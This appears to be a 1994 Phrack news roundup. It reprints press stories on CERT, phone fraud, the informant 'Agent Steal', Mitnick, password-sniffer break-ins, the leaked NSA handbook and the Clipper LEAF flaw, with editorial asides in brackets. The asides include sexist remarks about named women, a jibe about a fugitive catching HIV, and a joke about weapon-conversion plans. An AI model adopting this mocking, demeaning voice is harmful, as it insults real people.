Hal Eisner:             "That's from residents of that cyberspacious world
[Shot of someone holding a diskette with what is supposed to be codez on the
label]
                        of behind the computer screen where the shy can be
[Code Thief on the background]
                        dangerous.  Reporting from Las Vegas, Hal Eisner,
                        Real News.

------------------------------------------------------------------------------

Cyber Cops                                                        May 23, 1994
~~~~~~~~~~
by Joseph Panettieri (Information Week) (Page 30)

When Chris Myers, a software engineer at Washington University in
St. Louis, arrived to work one Monday morning last month, he realized
something wasn't quite right.  Files had been damaged and a back door
was left ajar.  Not in his office, but on the university's computer network.

Like Commissioner Gordon racing to the Batphone, Myers swiftly called the
Internet's guardian, the Computer Emergency Response Team (CERT).

The CERT team boasts impressive credentials.  Its 14 team members are
managed by Dain Gary, former director of corporate data security at
Mellon Bank Corp. in Pittsburgh.  While Gary is the coach of the CERT
squad, Moira West is the scrambling on-field quarterback.  As manager
of CERT's incident-response team and coordination center, she oversees
the team's responses to attacks by Internet hackers and its search for
ways to reduce the Internet's vulnerabilities.  West was formerly a
software engineer at the University of York in England.

The rest of the CERT team remains in the shadows.  West says
the CERT crew hails from various information-systems backgrounds,
but declines to get more specific, possibly to hide any Achilles'
heels from hackers.

One thing West stresses is that CERT isn't a collection of reformed
hackers combing the Internet for suspicious data.  "People have to
trust us, so hiring hackers definitely isn't an option," she says.
"And we don't probe or log-on to other people's systems."

As a rule, CERT won't post an alert until after it finds a
remedy to the problem.  But that can take months, giving hackers
time to attempt similar breakins on thousands of Internet hosts
without fear of detection.  Yet CERT's West defends this policy:
"We don't want to cause mass hysteria if there's no way to
address a new, isolated problem.  We also don't want to alert the
entire intruder community about it."

------------------------------------
Who You Gonna Call?
How to reach CERT

Phone: 412-268-7090
Internet: cert@cert.org
Fax: 412-268-6989
Mail: CERT Coordination Center
      Software Engineering Institute
      Carnegie Mellon University
      Pittsburgh, PA 15213-3890
------------------------------------

[Ask for that saucy British chippie.  Her voice will melt you like
 butter.

 CERT -- Continually re-emphasizing the adage:  "You get what you pay for!"]

 And remember, CERT doesn't hire hackers, they just suck the juicy bits
 out of their brains for free.

------------------------------------------------------------------------------

Defining the Ethics of Hacking                                 August 12, 1994
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by Amy Harmon (Los Angeles Times) (page A1)

Eric Corley, a.k.a Emmanuel Goldstein -- patron saint of computer
hackers and phone phreaks -- is having a party.

And perhaps it is just in time. 2600, the hacker magazine Corley
started when he was 23, is a decade old. It has spawned monthly
hacker meetings in dozens of cities. It has been the target of a
Secret Service investigation. It has even gone aboveground, with
newsstand sales of 20,000 last year.

As hundreds of hackers converge in New York City this weekend to celebrate
2600's anniversary, Corley hopes to grapple with how to uphold the
"hacker ethic," an oxymoron to some, in an era when many of 2600's devotees
just want to know how to make free phone calls.  (Less high-minded
activities -- like cracking the New York City subway's new electronic
fare card system -- are also on the agenda).

Hackers counter that in a society increasingly dependent on
technology, the very basis for democracy could be threatened by limiting
technological exploration. "Hacking teaches people to think critically about
technology," says Rop Gonggrijp, a Dutch hacker who will attend the Hackers
on Planet Earth conference this weekend. "The corporations that are building
the technology are certainly not going to tell us, because they're trying to
sell it to us. Whole societies are trusting technology blindly -- they just
believe what the technocrats say."

Gonggrijp, 26, publishes a magazine much like 2600 called Hack-Tic,
which made waves this year with an article showing that while tapping mobile
phones of criminal suspects with radio scanners, Dutch police tapped into
thousand of other mobile phones.

"What society needs is people who are independent yet knowledgeable,"
Gonggrijp said. 'That's mostly going to be young people, which society is
uncomfortable with. But there's only two groups who know how the phone and
computer systems work, and that's engineers and hackers. And I think that's
a very healthy situation."

[By the way Amy:  Phrack always grants interviews to cute, female
 LA Times reporters.]

------------------------------------------------------------------------------

Fighting Telephone Fraud                                        August 1, 1994
~~~~~~~~~~~~~~~~~~~~~~~~
by Barbara DePompa (Information Week) (Page 74)

Local phone companies are taking an active role in warning customers of
scams and cracking down on hackers.

Early last month, a 17-year old hacker in Baltimore was caught
red-handed with a list of more than 100 corporate authorization codes that
would have enabled fraud artists to access private branch exchanges and
make outgoing calls at corporate expanse.

After the teenager's arrest, local police shared the list with Bell
Atlantic's fraud prevention group. Within hours, the phone numbers were
communicated to the appropriate regional phone companies and corporate
customers on the list were advised to either change their authorization
codes or shut down outside dialing privileges.

"We can't curb fraud without full disclosure and sharing this type
of vital information" points out Mary Chacanias, manager of
telecommunications fraud prevention for Bell Atlantic in Arlington, VA.

-----------------------------------------------------------------------------

AT&T Forms Team to Track Hackers                              August 30, 1994
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
(Reuters News Wire)

AT&T Corp.'s Global Business Communications Systems subsidiary said
Wednesday it has formed an investigative unit to monitor, track and
catch phone-system hackers in the act of committing toll fraud.

The unit will profile hacker activity and initiate "electronic
stakeouts" with its business communications equipment in cooperation
with law enforcement agencies, and work with them to prosecute the
thieves.

"We're in a shoot-out between 'high-tech cops' -- like AT&T -- and
'high-tech robbers' who brazenly steal long distance service from our
business customers," said Kevin Hanley, marketing director for business
security systems for AT&T Global Business.

"Our goal is not only to defend against hackers but to get them off the
street."

[Oh my God.  Are you scared?  Have you wet yourself?  YOU WILL!]

-----------------------------------------------------------------------------

Former FBI Informant a Fugitive                                 July 31, 1994
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by Keith Stone (Daily News)

Computer outlaw Justin Tanner Petersen and prosecutors
cut a deal:  The Los Angeles nightclub promoter known in
the computer world as "Agent Steal" would work for the
government in exchange for freedom.

With his help, the government built its case against
Kevin Lee Poulsen, a Pasadena native who pleaded guilty
in June to charges he electronically rigged telephones at
Los Angeles radio stations so he could win two Porsches,
$22,000 and two trips to Hawaii.

Petersen also provided information on Kevin Mitnick, a
Calabasas man wanted by the FBI for cracking computer and
telephone networks at Pacific Bell and the state Department
of Motor Vehicles, according to court records.

Petersen's deal lasted for nearly two years - until
authorities found that while he was helping them undercover,
he also was helping himself to other people's credit cards.

Caught but not cornered, the 34-year-old "Agent Steal" had
one more trick: He admitted his wrongdoing to a prosecutor
at the Los Angeles U.S. Attorney's Office, asked to meet
with his attorney and then said he needed to take a walk.

And he never came back.

A month after Petersen fled, he spoke with a magazine for
computer  users about his role as an FBI informant, who he
had worked against and his plans for the future.

"I have learned a lot about how the bureau works.  Probably
too much," he said in an interview that Phrack Magazine published
Nov. 17, 1993.  Phrack is available on the Internet, a worldwide
network for computer users.

Petersen told the magazine that working with the FBI was fun
most of the time.  "There was a lot of money and resources used.
In addition, they paid me well," he said.

"If I didn't cooperate with the bureau," he told Phrack, "I
could have been charged with possession of government material."

"Most hackers would have sold out their mother," he added.

Petersen is described as 5 foot, 11 inches, 175 pounds, with
brown hair - "sometimes platinum blond."  But his most telling
characteristic is that he walks with the aid of a prosthesis
because he lost his left leg below the knee in a car accident.

Heavily involved in the Hollywood music scene, Petersen's
last known employer was Club "Velvet Jam," one of a string of
clubs he promoted in Los Angeles.

-----------------------------------------------------------------------------

Hacker in Hiding                                                July 31, 1994
~~~~~~~~~~~~~~~~
by John Johnson (LA Times)

First there was the Condor, then Dark Dante.  The latest computer hacker to
hit the cyberspace most wanted list is Agent Steal, a slender, good-looking
rogue partial to Porsches and BMWs who bragged that he worked undercover
for the FBI catching other hackers.

Now Agent Steal, whose real name is Justin Tanner Petersen, is on the run
from the very agency he told friends was paying his rent and flying him to
computer conferences to spy on other hackers.

Petersen, 34, disappeared Oct. 18 after admitting to federal prosecutors
that he had been committing further crimes during the time when he was
apparently working with the government "in the investigation of other
persons," according to federal court records.

Ironically, by running he has consigned himself to the same secretive life
as Kevin Mitnick, the former North Hills man who is one of the nation's most
infamous hackers, and whom Petersen allegedly bragged of helping to set up
for an FBI bust.  Mitnick, who once took the name Condor in homage to a
favorite movie character, has been hiding for almost two years to avoid
prosecution for allegedly hacking into computers illegally and posing as a
law enforcement officer.

Authorities say Petersen's list of hacks includes breaking into computers
used by federal investigative agencies and tapping into a credit card
information bureau.  Petersen, who once promoted after-hours rock shows in
the San Fernando Valley, also was involved in the hacker underground's most
sensational scam - hijacking radio station phone lines to win contests with
prizes ranging from new cars to trips to Hawaii.

Petersen gave an interview last year to an on-line publication called Phrack
in which he claimed to have tapped the phone of a prostitute working for
Heidi Fleiss.  He also boasted openly of working with the FBI to bust
Mitnick.

"When I went to work for the bureau I contacted him," Petersen said in the
interview conducted by Mike Bowen.  "He was still up to his old tricks, so
we opened a case on him. . . . What a loser.  Everyone thinks he is some
great hacker.  I outsmarted him and busted him."

In the Phrack interview, published on the Internet, an international network
of computer networks with millions of users, Agent Steal bragged about
breaking into Pacific Bell headquarters with Poulsen to obtain information
about the phone company's investigation of his hacking.

Petersen was arrested in Texas in 1991, where he lived briefly.  Court
records show that authorities searching his apartment found computer
equipment, Pacific Bell manuals and five modems.

A grand jury in Texas returned an eight-count indictment against Petersen,
accusing him of assuming false names, accessing a computer without
authorization, possessing stolen mail and fraudulently obtaining and using
credit cards.

The case was later transferred to California and sealed, out of concern for
Petersen's safety, authorities said.  The motion to seal, obtained by
Sherman, states that Petersen, "acting in an undercover capacity, currently
is cooperating with the United States in the investigation of other persons
in California."

In the Phrack interview, Petersen makes no apologies for his choices in life.

While discussing Petersen's role as an informant, Mike Bowen says, "I think
that most hackers would have done the same as you."

"Most hackers would have sold out their mother," Petersen responded.

------------------------------------------------------------------------------

Computer Criminal Caught After 10 Months on the Run            August 30, 1994
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by Keith Stone (Daily News)

Convicted computer criminal Justin Tanner Petersen was captured Monday in
Los Angeles, 10 months after federal authorities said they discovered he
had begun living a dual life as their informant and an outlaw hacker.

Petersen, 34, was arrested about 3:30 a.m. outside a Westwood apartment
that FBI agents had placed under surveillance, said Assistant U.S.
Attorney David Schindler.

A flamboyant hacker known in the computer world as "Agent Steal," Petersen
was being held without bail in the federal detention center in Los Angeles.
U.S. District Court Judge Stephen V. Wilson scheduled a sentencing hearing
for Oct. 31.

Petersen faces a maximum of 40 years in prison for using his sophisticated
computer skills to rig a radio contest in Los Angeles, tap telephone lines
and enrich himself with credit cards.

Monday's arrest ends Petersen's run from the same FBI agents with whom he
had once struck a deal: to remain free on bond in exchange for pleading
guilty to several computer crimes and helping the FBI with other hacker
cases.

The one-time nightclub promoter pleaded guilty in April 1993 to six federal
charges.  And he agreed to help the government build its case against Kevin
Lee Poulsen, who was convicted of manipulating telephones to win radio
contests and is awaiting trial on espionage charges in San Francisco.

Authorities said they later learned that Petersen had violated the deal by
committing new crimes even as he was awaiting sentencing in the plea
agreement.

On Monday, FBI agents acting on a tip were waiting for Petersen when he parked
a BMW at the Westwood apartment building.  An FBI agent called Petersen's
name, and Petersen began to run, Schindler said.

Two FBI agents gave chase and quickly caught Petersen, who has a prosthetic
lower left leg because of a car-motorcycle accident several years ago.

In April 1993, Petersen pleaded guilty to six federal charges including
conspiracy, computer fraud, intercepting wire communications, transporting
a stolen vehicle across state lines and wrongfully accessing TRW credit
files.  Among the crimes that Petersen has admitted to was working with other
people to seize control of telephone lines so they could win radio
promotional contests.  In 1989, Petersen used that trick and walked away with
$10,000 in prize money from an FM station, court records show.

When that and other misdeeds began to catch up with him, Petersen said, he
fled to Dallas, where he assumed the alias Samuel Grossman and continued
using computers to make money illegally.

When he as finally arrested in 1991, Petersen played his last card.
"I called up the FBI and said: 'Guess what? I am in jail,' " he said.
He said he spent the next four months in prison, negotiating for his freedom
with the promise that he would act as an informant in Los Angeles.

The FBI paid his rent and utilities and gave him $200 a week for spending
money and medical insurance, Petersen said.

They also provided him with a computer and phone lines to gather information
on hackers, he said.

Eventually, Petersen said, the FBI stopped supporting him so he turned to
his nightclubs for income.  But when that began to fail, he returned to
hacking for profit.

"I was stuck out on a limb.  I was almost out on the street.  My club
was costing me money because it was a new club," he said.  "So I did what
I had to do.  I an not a greedy person."

[Broke, Busted, Distrusted.  Turning in your friends leads to some
 seriously bad Karma, man.  Negative energy like that returns ten-fold.
 You never know in what form either.  You could end getting shot,
 thrown in jail, or worse, test HIV Positive.  So many titty-dancers,
 so little time, eh dude?  Good luck and God bless ya' Justin.]

-----------------------------------------------------------------------------

Fugitive Hacker Baffles FBI With Technical Guile                 July 5, 1994
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by John Markoff (New York Times)

[Mitnik, Mitnik, Mitnik, and more Mitnik.  Poor bastard.  No rest for
 the wicked, eh Kevin?]

-----------------------------------------------------------------------------

Computer Outlaws Invade the Internet                             May 24, 1994
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by Mike Toner (Atlanta Journal-Constitution)

A nationwide wave of computer break-ins has law enforcement
authorities scrambling to track down a sophisticated ring of
"hackers" who have used the international "information
highway," the Internet, to steal more than 100,000 passwords -- the
electronic keys to vast quantities of information stored on
government, university and corporate computer systems.

Since the discovery of an isolated break-in last year at a
single computer that provides a "gateway" to the Internet,
operators of at least 30 major computer systems have found illicit
password "sniffers" on their machines.

The Federal Bureau of Investigation has been investigating the
so-called "sniffer" attacks since February, but security experts
say the intrusions are continuing -- spurred, in part, by the
publication last month of line-by-line instructions for the
offending software in an on-line magazine for hackers.

Computer security experts say the recent rash of password piracy
using the Internet is much more serious than earlier security
violations, like the electronic "worm" unleashed in 1988 by
Cornell University graduate student Robert Morris.

"This is a major concern for the whole country," she says.
"I've had some sleepless nights just thinking about what could
happen. It's scary. Once someone has your ID and your password,
they can read everything you own, erase it or shut a system down.
They can steal proprietary information and sell it, and you might
not even know it's gone."

"Society has shifted in the last few years from just using
computers in business to being absolutely dependent on them and the
information they give us -- and the bad guys are beginning to
appreciate the value of information," says Dain Gary, manager of
the Computer Emergency Response Team (CERT), a crack team of
software experts at Carnegie-Mellon University in Pittsburgh that
is supported by the Defense Department's Advanced Research Projects
Agency.

Gary says the current rash of Internet crime appears to be the
work of a "loosely knit but fairly organized group" of computer
hackers adept not only at breaking and entering, but at hiding
their presence once they're in.

Most of the recent break-ins follow a similar pattern. The
intruders gain access to a computer system by locating a weakness
in its security system -- what software experts call an "unpatched
vulnerability."

Once inside, the intruders install a network monitoring program,
a "sniffer," that captures and stores the first 128 keystrokes
of all newly opened accounts, which almost always includes a user's
log-on and password.

"We really got concerned when we discovered that the code had
been published in Phrack, an on-line magazine for hackers, on April
1," he says. "Putting something like that in Phrack is a little
like publishing the instructions for converting semiautomatic
weapons into automatics.

Even more disturbing to security experts is the absence of a
foolproof defense. CERT has been working with computer system
administrators around the country to shore up electronic security,
but the team concedes that such "patches" are far from perfect.

[Look for plans on converting semiautomatic weapons into automatics
 in the next issue.]
------------------------------------------------------------------------------

Information Superhighwaymen - Hacker Menace Persists                  May 1994
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
(Open Computing) (Page 25)

Once again the Internet has been labeled a security problem.  And a new
breed of hackers has attracted attention for breaking into systems.
"This is a group of people copying what has been done for years," says
Chris Goggans, aka Erik Bloodaxe.  "There's one difference:  They don't
play nice."

Goggans was a member of the hacker gang called the Legion of Doom in the
late '80s to early '90s.  Goggans says the new hacking group, which goes
by the name of "The Posse," has broken into numerous Business Week 1000
companies including Sun Microsystems Inc., Boeing, and Xerox.  He says
they've logged onto hundreds of universities and online services like
The Well.  And they're getting root access on all these systems.

For their part, The Posse--a loose band of hackers--isn't talking.

------------------------------------------------------------------------------

Security Experts:  Computer Hackers a Growing Concern            July 22, 1994
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
New York Times News Wire (Virginian-Pilot and Ledger Star) (2A)

Armed with increasing sophisticated snooping tools, computer programmers
operating both in the United States and abroad have gained unauthorized
access to hundreds of sensitive but unclassified government and military
computer networks called Internet, computer security experts said.

Classified government and military data, such as those that control
nuclear weapons, intelligence and other critical functions, are not
connected to the Internet and are believed to be safe from the types of
attacks reported recently.

The apparent ease with which hackers are entering military and government
systems suggests that similar if not greater intrusions are under way on
corporate, academic and commercial networks connected to the Internet.

Several sources said it was likely that only a small percentage of
intrusions, perhaps fewer than 5 percent, have been detected.

------------------------------------------------------------------------------

NSA Semi-confidential Rules Circulate
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
By Keay Davidson (San Francisco Examiner) (Page A1)

It arrived mysteriously at an Austin, Texas, post office box by "snail
mail" - computerese for the Postal Service.  But once the National Security
Agency's employee handbook was translated into bits and bytes, it took
only minutes to circulate across the country.

Thus did a computer hacker in Texas display his disdain for government
secrecy last week - by feeding into public computer networks the
semiconfidential document, which describes an agency that, during the darkest
days of the Cold War, didn't officially "exist."

Now, anyone with a computer, telephone, modem and basic computer skills
can read the 36-page manual, which is stamped "FOR OFFICIAL USE ONLY" and
offers a glimpse of the shadowy world of U.S. intelligence - and the personal
price its inhabitants pay.

"Your home, car pool, and public places are not authorized areas to
conduct classified discussions - even if everyone involved in the discussion
possesses a proper clearance and "need-to-know.' The possibility that a
conversation could be overheard by unauthorized persons dictates the need to
guard against classified discussions in non-secure areas."

The manual is "so anal retentive and paranoid. This gives you some
insight into how they think," said Chris Goggans, the Austin hacker who
unleashed it on the computer world. His on-line nom de plume is "Erik
Bloodaxe" because "when I was about 11, I read a book on Vikings, and that
name really struck me."

NSA spokeswoman Judi Emmel said Tuesday that "apparently this document is
an (NSA) employee handbook, and it is not classified."    Rather, it is an
official NSA employee manual and falls into a twilight zone of secrecy. On
one hand, it's "unclassified." On the other hand, it's "FOR OFFICIAL USE
ONLY" and can be obtained only by filing a formal request under the U.S.
Freedom of Information Act, Emmel said.

"While you may take this handbook home for further study, remember that
it does contain "FOR OFFICIAL USE ONLY' information which should be
protected," the manual warns. Unauthorized release of such information could
result in "appropriate administrative action ... (and) corrective and/or
disciplinary measures."

Goggans, 25, runs an on-line electronic "magazine" for computer hackers
called Phrack, which caters to what he calls the "computer underground." He
is also a computer engineer at an Austin firm, which he refuses to name.

The manual recently arrived at Goggans' post office box in a white
envelope with no return address, save a postmark from a Silicon Valley
location, he says. Convinced it was authentic, he typed it into his computer,
then copied it into the latest issue of Phrack.

Other hackers, like Grady Ward of Arcata, Humboldt County, and Jeff
Leroy Davis of Laramie, Wyo., redistributed the electronic files to computer
users' groups. These included one run by the Cambridge, Mass.-based
Electronic Frontier Foundation, which fights to protect free speech on
computer networks.

Ward said he helped redistribute the NSA manual "to embarrass the NSA"
and prove that even the U.S. government's most covert agency can't keep
documents secret.

The action also was aimed at undermining a federal push for
data-encryption regulations that would let the government tap into computer
networks, Ward said.

[Yeah...sure it was, Grady.]
------------------------------------------------------------------------------

Hackers Stored Pornography in Computers at Weapons Lab           July 13, 1994
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by Adam S. Bauman (Virginian-Pilot and Ledger-Star) (Page A6)

One of the nation's three nuclear weapons labs has confirmed that
computer hackers were using its computers to store and distribute
hard-core pornography.

The offending computer, which was shut down after a Los Angeles Times
reporter investigating Internet hacking alerted lab officials, contained
more than 1,000 pornographic images.  It was believed to be the largest
cache of illegal hardcore pornography ever found on a computer network.

At Lawrence Livermore, officials said Monday that they believed at least
one lab employee was involved in the pornography ring, along with an
undetermined number of outside collaborators.

[Uh, let me see if I can give this one a go:

 A horny lab technician at LLNL.GOV uudecoded gifs for days on end
 from a.b.p.e.  After putting them up on an FSP site, a nosey schlock
 reporter blew the whistle, and wrote up a big "hacker-scare" article.

 The top-notch CIAC team kicked the horn-dog out the door, and began
 frantically scouring the big Sun network at LLNL for other breaches,
 all the while scratching their heads at how to block UDP-based apps
 like FSP at their firewall.  MPEGs at 11.

 How does shit like this get printed????]

------------------------------------------------------------------------------

Clipper Flaw May Thwart Fed Effort                                June 6, 1994
by Aaron Zitner (Boston Globe)

Patents, Technical Snares May Trip Up the 'Clipper'               June 6, 1994
by Sharon Fisher (Communications Week) (Page 1)

[Clipper, Flipper, Slipper.  It's all a big mess, and has obsoleted
itself.  But, let's sum up the big news:

 How the Clipper technology is SUPPOSED to work

 1) Before an encoded message can be sent, a clipper computer chip
 assigns and tests a scrambled group of numbers called a LEAF, for
 Law Enforcement Access Field.  The LEAF includes the chip's serial
 number, a "session key" number that locks the message and a "checksum"
 number that verifies the validity of the session key.

 2) With a warrant to wiretap, a law-enforcement agency like the FBI
 could record the message and identify the serial number of a Clipper
 chip.  It would then retrieve from custodial agencies the two halves of
 that chip's decoding key.

 3) Using both halves of the decoding key, the FBI would be able to
 unscramble the session key number, thus unlocking the messages or data
 that had been protected.

 How the Clipper technology is FLAWED  (YAY, Matt Blaze!)

 1) Taking advantage of design imperfections, people trying to defeat
 the system could replace the LEAF until it erroneously passed the
 "checksum" verification, despite an invalid session-key number.

 2) The FBI would still be able to retrieve a decoding key, but it would
 prove useless.

 3) Because the decoding key would not be able to unscramble the invalid
 session key, the message would remain locked.]


--------------------------------------------------------------------------------